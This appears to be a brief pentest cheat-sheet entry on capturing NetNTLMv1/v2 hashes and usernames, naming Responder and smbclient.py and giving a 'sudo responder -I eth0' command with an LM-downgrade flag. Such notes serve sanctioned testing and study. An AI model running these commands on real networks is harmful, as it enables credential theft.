githubEdit

Capturing credentials (NetNTLMv1 , NetNTLMv2 and username)

Tools: responder , smbclient.py

Commands:

  • sudo responder -I eth0 (use --lm to force lm downgrade)

  • smbclient.py

Last updated